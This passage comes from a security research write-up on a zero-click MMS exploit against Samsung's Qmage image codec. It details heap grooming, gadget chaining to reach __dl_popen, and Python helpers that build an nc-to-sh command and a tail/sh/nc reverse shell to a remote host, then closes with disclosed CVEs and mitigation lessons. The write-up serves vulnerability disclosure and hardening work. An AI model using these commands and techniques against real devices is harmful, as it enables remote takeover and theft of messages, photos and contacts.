- Region Z (7160 bytes) is a fixed size inflate_state structure allocated inside inflateInit2_.

Considering that both the length and contents of regions X and Y are user-controlled, they match our requirements just perfectly. If we make them both between 129-160 bytes long, and set up the deflated data to have a specific 64-bit value at offset 0x90, then the pixel buffer will reuse region X, the Bitmap object will reuse region Y, and the freeFunc pointer will inherit the specially crafted value from the color table. This can be confirmed with a simple heap-tracing Frida script attached to the com.samsung.android.messaging process:

Indeed, both regions allocated in the color table handling were then reused for the Bitmap object. If we set the freeFunc pointer to all 0x41's, and configure the first few pixels of the bitmap to contain an ASCII string, we should be able to trigger the following crash via MMS:

Success! We have managed to hijack the control flow while having the first argument (X0 register) point to a text string of our choice, without having to leak its address. Before using this primitive to execute commands, let's quickly review an alternative method to achieve this outcome.

Technique #2 – libwebp to the rescue

If we look at the full definition of the android::Bitmap class, as presented in Part 3, we'll notice that the address of the pixel buffer is stored not just in the heap.address field at offset 0x80, but also at offset 0x18 as part of the SkPixelRef base class:

This means that to achieve our goal, we should look for routines which call a function pointer loaded from some offset within the this object, and pass the value at offsets 0x18 or 0x80 of this as its first argument. We could then point the fake vtable at that function, provided that there is a reference to it somewhere in static memory of libhwui.so or linker64.

One example of such a fitting gadget that I have found is the static Execute function used in libwebp, which is compiled into libhwui.so (not once but twice, thanks to the Qmage codec):

It calls a function pointer with two arguments, both of them loaded from an input WebPWorker structure. Let's compare it side-by-side with the prologue of android::Bitmap:

This layout checks all the boxes for successful exploitation: data1 overlaps with fPixels, the hook function pointer is stored before it, and there is still enough room left for the fake vtable pointer and refcount. It would be hard to imagine more convenient circumstances, as we get a reliable, controlled call with a string argument with just a minor Bitmap overflow of 0x18 bytes:

- vtable → &g_worker_interface.Sync in libhwui.so,

- fRefCnt → 1,

- fHeight (full 64-bit value at offset 0x10) → destination $PC value.
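The three overwritten fields listed above can be sketched as a 0x18-byte prefix packed in Python. The offsets 0x0, 0x10 and 0x18 follow the text; treating the refcount as a 32-bit value followed by another 32-bit field at offset 0xC is my assumption about the layout, and both addresses in the example are placeholders rather than real libhwui.so values.

```python
import struct


def build_bitmap_prefix(sync_slot_addr: int, target_pc: int, field_at_0xc: int = 0) -> bytes:
    """Pack the first 0x18 bytes of the corrupted android::Bitmap object.

    Hypothetical helper. Assumed layout:
      0x00  vtable pointer (64-bit)  -> address of g_worker_interface.Sync
      0x08  fRefCnt (32-bit)         -> 1
      0x0C  32-bit field not discussed in the text (kept at 0 here)
      0x10  64-bit value             -> destination PC (overlaps WebPWorker's hook)
    """
    return struct.pack("<QIIQ", sync_slot_addr, 1, field_at_0xc, target_pc)


# Placeholder addresses only; in a real attack both come from the ASLR oracle.
prefix = build_bitmap_prefix(0x7000001000, 0x4242424242424242)
print(hex(len(prefix)), prefix.hex())
```

Nothing past offset 0x18 is touched, so the pixel buffer pointer that follows keeps its original value and becomes the first argument of the hijacked call.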

We can once again test it via MMS against the Messages app:

This gets us within arm's reach of popping a shell on the remote device. There's just one last detail to take care of…

Adjusting the second argument

As mentioned earlier, the major difference between libc's system() and linker64's __dl_popen() is that the latter expects a pointer to readable memory in the second argument:

Unfortunately, both techniques for setting the first parameter to a string clobber the second one with a small integer, which is never a valid pointer (see the X1 register values in the crash logs above). To solve the problem, we need to use an extra, intermediate gadget that will call another function pointer, pass through the first string argument and initialize the second one to a valid address. The ReadStreaEndError function, which is an (unused) part of the Qmage codec in libhwui.so, is the perfect candidate for the task. It operates on a structure that I have reverse-engineered and called QmageStream:

The function's purpose is to read two bytes from the input stream and check if they're equal to "\xFF\x00" (in C-like pseudo code, with the QMG_CopyData wrapper edited out for clarity):

So a function pointer from offset 0x18 of the input structure is called here, with the first argument set to the beginning of that structure, and the second being an address on the stack. That's exactly what we need, with the only downside being that the gadget limits the length of our shell command to 23 characters:

Both arguments are now compatible with the definition of __dl_popen, and if we change "BBBBBBBB" to the address of that function, we'll be able to execute arbitrary (though relatively short) commands!
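The 23-character limit follows directly from the layout: the command string starts at offset 0 of the fake structure, the function pointer sits at offset 0x18, and one byte is needed for the NUL terminator. A minimal sketch of that packing is shown below; `build_fake_stream` is a hypothetical helper name, and the pointer value is the same "BBBBBBBB" placeholder used in the text.

```python
import struct

FUNC_PTR_OFFSET = 0x18                  # offset of the called pointer (from the text)
MAX_COMMAND_LEN = FUNC_PTR_OFFSET - 1   # 23 characters plus a NUL terminator


def build_fake_stream(command: str, func_ptr: int) -> bytes:
    """Lay out a NUL-padded command followed by a 64-bit function pointer."""
    raw = command.encode("ascii")
    if len(raw) > MAX_COMMAND_LEN:
        raise ValueError(f"command is {len(raw)} bytes, limit is {MAX_COMMAND_LEN}")
    # ljust pads with NUL bytes up to offset 0x18, which also terminates the string.
    return raw.ljust(FUNC_PTR_OFFSET, b"\x00") + struct.pack("<Q", func_ptr)


placeholder_ptr = int.from_bytes(b"BBBBBBBB", "little")
fake_stream = build_fake_stream("id", placeholder_ptr)
print(fake_stream)
```

In the attack these bytes would form the start of the pixel buffer, so that the gadget receives a pointer to the command as its first argument.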

Popping a (reverse) shell

While 23 characters is not much, it is perfectly sufficient to convert the short command to a full-fledged reverse shell. Android devices ship with toybox, a Unix command line tool set that includes some standard networking utilities, such as netcat. Unfortunately, the Android build of nc doesn't support the -e flag, which is the canonical way to set up a reverse shell, but we can work around that. One easy solution is to connect to a remote host and load a new command without any length restrictions, and pipe it to sh:

It's very short, leaving up to 16 bytes for the combined length of the host and port, which is plenty of space. According to my testing, the direct "nc" symlink was introduced as recently as Android 10, but even when invoking netcat through the full "toybox nc" command on Android 9 and earlier, there are 9 characters left for the host/port, and 6-letter domains are still easily registered today. In my case, let's assume I executed the following line:
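As a sanity check of the length budget, the sketch below assumes that the first-stage command takes the form `nc <host> <port>|sh` (or `toybox nc <host> <port>|sh` on older systems), which is consistent with the 16 and 9 character figures quoted above. The function names are hypothetical, and `example.com` is a placeholder host rather than the one used in the attack.

```python
MAX_COMMAND_LEN = 23   # limit imposed by the intermediate gadget (from the text)


def first_stage(host: str, port: int, toybox_prefix: bool = False) -> str:
    """Build the assumed first-stage command and enforce the 23-character limit."""
    tool = "toybox nc" if toybox_prefix else "nc"
    command = f"{tool} {host} {port}|sh"
    if len(command) > MAX_COMMAND_LEN:
        raise ValueError(f"{command!r} is {len(command)} characters long")
    return command


def host_port_budget(toybox_prefix: bool = False) -> int:
    """Characters left for host and port combined, not counting the space between them."""
    tool = "toybox nc" if toybox_prefix else "nc"
    overhead = len(f"{tool}  |sh")   # tool name, two spaces and the pipe to sh
    return MAX_COMMAND_LEN - overhead


print(host_port_budget(), host_port_budget(toybox_prefix=True))
print(first_stage("example.com", 1338))
```

With the plain `nc` form, an 11-character host and a 4-digit port still fit with one character to spare, while the same pair is too long for the `toybox nc` form.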

Then on port 1338 of the remote host, I served the second stage payload:

This is a cool trick to spawn a reverse shell with nc without the -e option, which I found here. It pipes together tail, sh and nc to achieve the result, and uses a temporary file (in a path accessible to the target process) to store the input commands. The gist of the trick is the -f tail option, used to pass commands to sh as they arrive over the network, providing the interactive feel. Once we send the above payload on port 1338, we should momentarily receive another connection on port 1337 with the full reverse shell:
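The tail, sh and nc pipeline described above can be sketched as a small Python helper that only assembles the command text. This is my reading of the description and not necessarily the exact payload that was served: the function name, the scratch file path and the host are all placeholders, and only port 1337 comes from the text.

```python
import shlex


def second_stage(host: str, port: int, scratch_file: str) -> str:
    """Assemble a shell line that feeds network input to sh through a followed file.

    Data flow: nc writes whatever it receives into scratch_file, tail -f streams
    new lines of that file into sh, and sh's output goes back out through nc.
    """
    f = shlex.quote(scratch_file)
    h = shlex.quote(host)
    return (
        f"rm -f {f}; touch {f}; "                       # start from an empty scratch file
        f"tail -f {f} | sh 2>&1 | nc {h} {int(port)} > {f}"
    )


# Hypothetical values; the scratch path must be writable by the target process.
payload = second_stage("example.com", 1337, "/path/writable/by/app/f")
print(payload)
```

The scratch file is created up front so that tail has something to follow before nc opens it for writing.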

And that's it! As shown in the exploit demo, the attacker now has remote access to the device in the security context of the Samsung Messages app. This effectively means that they can access the SMS/MMS messages, photos, contacts, and a number of other types of information on the phone. Given that the vulnerable Qmage codec is baked so deeply in Samsung Android, the attacker could try to further expand their reach in the system by exploiting the same vulnerability locally, compromising the context of another app and gaining access to its data. One example of a potential attack target is the com.android.systemui process, which is highly privileged by nature and is responsible for handling images supplied by other apps to be displayed in notifications. In a similar vein, some degree of persistence could be established by planting an exploit .qmg file in the file system, and having it connect back to a remote host every time the user opens the Gallery app. Once initial command line access to the target phone is obtained, the possibilities of abusing Qmage bugs locally are virtually endless.

Future work

The journey of developing a zero-click MMS exploit against a modern Samsung phone running Android 10 comes to an end. The fundamental reason why the attack was possible was the custom, exceedingly fragile image codec built into Android Skia by Samsung. In order to address the immediate problem, I ran two Qmage fuzzing sessions and reported the resulting crashes to the vendor: one in January 2020 (fixed in May as SVE-2020-16747 / CVE-2020-8899), and a subsequent one in May (fixed in July as SVE-2020-17675). I would like to believe that the codec is now in a much better shape, but I encourage other members of the security community to continue testing it, either with the existing SkCodecFuzzer harness or other custom tools.

While Qmage is the primary culprit here, the vulnerabilities created a great opportunity to test the effectiveness of various Android 10 mitigations and design decisions against low-level exploitation in a realistic setting. Throughout the process, I managed to take advantage of weaknesses in various parts of the OS; some of them were only of minor help, while others were absolutely critical to the feasibility of the exploitation:

- The Samsung Messages app automatically downloads incoming MMS messages and parses attached images without user interaction and before completing communication with the MMSC, which opens up the remote attack surface and enables the creation of a crash-based ASLR oracle.

- The image parsing code executes in the same process as the client app, and is not sandboxed the way video codecs are.

- The Android ASLR suffers from several flaws:

  - The Zygote design causes a persistent address space layout across subsequent instances of a crashing app, enabling partial ASLR side channel output to be accumulated over time and combined into a complete ASLR bypass.

  - The sizable CFI shadow region makes it possible to blindly locate readable memory in the address space with an ASLR oracle.

  - The relative entropy between library mappings and the shadow area is quite low, especially for linker64.

  - The presence of execute-only mappings makes it easy to recognize specific shared objects with an oracle, even if they are tightly packed in memory.

- The crash handling logic in ActivityManager allows for infinite restarts of an unstable app, provided that no two crashes occur within 60 seconds of each other (measured with the uptimeMillis clock).

- The jemalloc heap allocator has generally favorable properties for exploitation: it's deterministic, doesn't have inline metadata, groups chunks by size, and implements tcaches which may help control uninitialized heap memory with a high degree of precision.

- Android allows apps to spawn native command-line programs through functions like execve, system, __dl_popen etc. The system also includes networking tools such as netcat, which can be trivially used to set up a reverse shell for convenient remote access post-exploitation.

The above list gives a good overview of the areas for improvement, and we are working with both Android and Samsung to address them and introduce new hardening measures in future versions of the OS and the Samsung Messages app. In some areas, work had already been in motion before this project; for example, the upcoming Android 11 fully switches from jemalloc to Scudo as its default heap allocator, and execute-only memory (XOM) is being reverted because it breaks PAN (Privileged Access Never). Furthermore, the effort has already led to some changes in ASLR:

All of these mitigations already make an MMS exploit substantially harder to develop, but there is still a lot of work to do. I will strive to push for further fixes in the areas enumerated above, to make sure that similar zero-click attacks against Android devices cannot be replicated in the future.

Conclusion

The blog post series demonstrated that there are still some very attractive and largely unexplored code bases written in memory-unsafe languages and exposed in widely used software today. It strikes me that the Qmage codec has stayed out of the public eye for so long, evading any kind of fuzzing or manual audit. It raises the question of how much other untested code runs on our desktops and mobile devices every day that we know nothing about, and it highlights the importance of transparency from software vendors. It's in the interest of users to be well-informed about the relevant attack surface, and to benefit from the collective work of the security community researching publicly documented code. Otherwise, bad actors are more incentivized to look for little-known, sensitive software components, and exploit them secretly. In that context, security by obscurity doesn't work, especially if obscurity is the primary element of the software security model.

Another takeaway is that successful exploitation of memory corruption issues in zero-click scenarios is still possible, despite significant efforts being made to mitigate such attacks. Admittedly, the existing security measures in Android made the exploitation harder, slower and less reliable; specifically, thanks to address randomization and the crash handling logic, the attack took between 1 and 2.5 hours instead of a single message. However, none of them ultimately stopped the exploit, and all it took to bypass ASLR was the forgotten feature of MMS delivery reports coupled with a strong address probing primitive.

Clearly, memory corruption is far from a solved problem, and keeping our systems secure requires continued work on all levels of software design and development. As we've seen, even minor decisions seemingly unrelated to security – such as whether to allow unlimited restarts of frequently crashing apps – can make the difference between a feasible and a thwarted exploit. This is where offensive exercises like this one bring the most value, as they help discern effective mitigations from futile ones, and guide further defensive work towards the areas that matter the most. On that note, I am especially looking forward to some new, fundamental advancements, such as the shift towards fast memory-safe languages like Rust, and widespread use of hardware-assisted mitigations such as Memory Tagging Extension.
